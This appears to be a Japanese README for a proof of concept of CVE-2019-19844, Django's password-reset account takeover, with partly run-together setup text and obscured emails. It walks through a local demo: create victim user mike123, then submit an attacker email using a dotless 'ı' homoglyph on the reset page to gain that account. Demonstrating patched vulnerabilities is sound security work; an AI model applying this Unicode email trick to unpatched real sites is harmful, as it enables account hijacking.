
CVE-2019-19844 の PoC ( https://www.djangoproject.com/weblog/2019/dec/18/security-releases/ )
CVE-2019-19844 の PoC
django_cve_2019_19844_poc)DJANGO_DATABASE_NAME に設定(例:export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc)pip install -r requirements.txt && ./manage.py migrate --noinput を実行shell コマンドで作成:>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', '[email protected]', 'test123')
./manage.py runserver を実行http://127.0.0.1:8000/accounts/password-reset/ を開くmı[email protected](攻撃者のメールアドレス)を入力し、送信ボタンをクリックmike123 ユーザーとしてログイン